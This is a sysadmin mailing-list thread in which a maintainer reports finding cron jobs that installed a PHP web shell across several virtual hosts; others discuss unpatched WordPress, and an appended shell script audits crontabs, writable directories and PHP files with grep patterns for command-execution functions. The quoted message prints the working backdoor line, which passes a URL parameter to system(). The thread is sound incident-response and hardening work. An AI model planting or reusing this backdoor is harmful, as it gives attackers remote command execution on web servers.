[Systems] Found a backdoor

Bernie Innocenti bernie at codewiz.org
Tue Mar 1 19:57:33 EST 2016


+walter

Can we appoint an official maintainer for walterbender.org? Sorry for
not stepping up myself, but I'm overwhelmed by work-related things and
trying to reduce my sysadmin load.

On 03/01/2016 02:50 PM, Samuel Cantero wrote:
> On Tue, Mar 1, 2016 at 3:21 AM, Bernie Innocenti <bernie at codewiz.org> wrote:
> 
>     On 02/25/2016 04:09 AM, Sebastian Silva wrote:
>     > Remember in June we had an incident with a broken Wordpress site.
>     > I switched to static generator since then.
>     >
>     > +1 on containers just learning more about them and finding them fascinating.
>     > Count me in on containerizing everything.
>     >
>     > I'm not aware of other wordpress sites. Maybe walter's blog?
>     > Wordpress is a PIA IMHO.
> 
>     Yes, WP is riddled with security holes. Back in October, Samuel helped
>     Walter upgrade walterbender.org on sunjammer. Samuel, can you confirm
>     that the WP instance is now fully patched and locked down?
> 
> 
> The WP version on the walterbender.org site is 4.3.1. The latest WP
> version is 4.4.2. I have checked the WP change log and found this:
> 
> 4.4.1 => WordPress versions 4.4 and earlier are affected by a cross-site
> scripting vulnerability that could allow a site to be compromised.
> 
> 4.4.2 => WordPress versions 4.4.1 and earlier are affected by two
> security issues: a possible SSRF for certain local URIs, and an open
> redirection attack.
> 
> This site also uses version 2.5.9 of the Akismet plugin. The latest
> version is 3.1.7. Significant information from the release notes:
> 
>   * Pre-emptive security improvements to ensure that the Akismet plugin
>     can't be used by attackers to compromise a WordPress installation.
>   * Closes a potential XSS vulnerability.
> 
> Of course, every version has a lot of bug fixes. We definitely should
> upgrade it and test that nothing breaks on the walterbender.org site.
> 
> Who is in charge of upgrading the other WP sites?
> 
> Regards,
> 
> Samuel C.
>  
> 
> 
> 
>     > Regards,
>     > Sebastian
>     >
>     >
>     > On 25/02/16 04:47, Bernie Innocenti wrote:
>     >> While I was looking for cronjobs in /var/spool/cron/crontabs/, I
>     >> found that www-data was executing commands like these:
>     >>
>     >> */27 * * * * echo '<?php if (substr(md5($_GET["localdate"]),0,6) == "6fbcb8") { $time = str_replace("@"," ",$_GET["localtime"]); @system($time); exit; } ?>' > /srv/www-somosazucar/blog/.cache.php
>     >>
>     >> Did you spot the system()? This executes arbitrary commands specified
>     >> via the "localtime" url parameter. Uh-oh.
>     >>
>     >> There were about a dozen lines like the above, installing
>     >> .cache.php in various virtualhosts. I kept a copy of the file in
>     >> /root/www-data.backdoor. The file was last written on Jun 23 2015,
>     >> which may correlate with the switch to the new website.
>     >>
>     >> I cleared the mess and searched the logs for requests containing
>     >> "localtime", but couldn't find any. I wonder if they could filter the
>     >> logs, since they were previously writable by www-data.
>     >>
>     >> Please watch out. We should ensure directories accessible over
>     >> http are not writable by user www-data, especially those in which
>     >> PHP and CGIs are enabled.
>     >>
>     >> Running several large sites under the same uid has always been a bad
>     >> security practice, and looking forward we should keep migrating
>     >> them to properly isolated containers.
>     >>
>     >> Finally, Wordpress is particularly dangerous and we should update and
>     >> harden all instances. Can someone please take care of this? I'll do
>     >> Mediawiki, which I know pretty well.
>     >>
>     >
> 
> 
>     --
>      _ // Bernie Innocenti
>      \X/  http://codewiz.org
>     _______________________________________________
>     Systems mailing list
>     Systems at lists.sugarlabs.org <mailto:Systems at lists.sugarlabs.org>
>     http://lists.sugarlabs.org/listinfo/systems
> 
> 
> 


-- 
 _ // Bernie Innocenti
 \X/  http://codewiz.org
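The backdoor Bernie describes above (a www-data cron job rewriting a .cache.php that pipes a URL parameter into system()) and his two follow-up points (web directories writable by www-data, and PHP enabled there) can be checked with a small audit. The following helpers are an added example, not code from the thread or from Sugar Labs' systems. They assume a Debian-style layout: per-user crontabs in /var/spool/cron/crontabs, vhost docroots under /srv/www-*, and the web server running as www-data; the sample paths and the `--run` flag are placeholders chosen for this example.

```shell
#!/bin/sh
# Added audit helpers, not from the original thread. Assumptions: Debian-style
# layout (per-user crontabs in /var/spool/cron/crontabs, docroots passed as
# arguments, web server account www-data). All paths below are placeholders.

WEB_USER="${WEB_USER:-www-data}"

# Crontab entries that write PHP into a docroot, the pattern found on the
# box: `echo '<?php ...' > .../.cache.php`. Prints file:line:entry.
scan_crontabs() {
    dir="${1:-/var/spool/cron/crontabs}"
    grep -HnE '<[?]php|> *[^ ]*\.php' "$dir"/* 2>/dev/null
}

# Files and directories under a docroot that the web server account can
# write to: world-writable, owned by it with u+w, or in its group with g+w.
# $2 may be a user name or a numeric uid. Anything listed here is a place a
# compromised www-data can drop a .cache.php or edit the logs.
writable_by_webuser() {
    root="$1"; user="${2:-$WEB_USER}"
    group="$(id -gn "$user" 2>/dev/null || printf '%s' "$user")"
    find "$root" \( -perm -0002 \
        -o \( -user "$user" -perm -0200 \) \
        -o \( -group "$group" -perm -0020 \) \) -print
}

# PHP files that both read request input and hand something to a command or
# eval sink (the quoted backdoor does both on one line). A cheap triage
# heuristic, not a malware scanner: review the hits by hand. find's -name
# also matches dotfiles such as .cache.php.
find_php_shells() {
    root="$1"
    find "$root" -type f -name '*.php' \
        -exec grep -lE '\$_(GET|POST|REQUEST|COOKIE)' {} + 2>/dev/null |
    while IFS= read -r f; do
        if grep -qE '(^|[^A-Za-z0-9_])(system|exec|passthru|shell_exec|popen|proc_open|eval|assert)[[:space:]]*\(' "$f"; then
            printf '%s\n' "$f"
        fi
    done
}

# Usage (placeholder paths): `sh audit.sh --run` audits every vhost on the box.
if [ "${1:-}" = "--run" ]; then
    scan_crontabs
    for d in /srv/www-*; do
        [ -d "$d" ] || continue
        writable_by_webuser "$d"
        find_php_shells "$d"
    done
fi
```

Run it as root so find can read every docroot. An empty result from writable_by_webuser is the target state for code directories; upload directories that must stay writable are the ones where PHP execution should be disabled in the vhost config, which is the second half of the advice in the thread.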

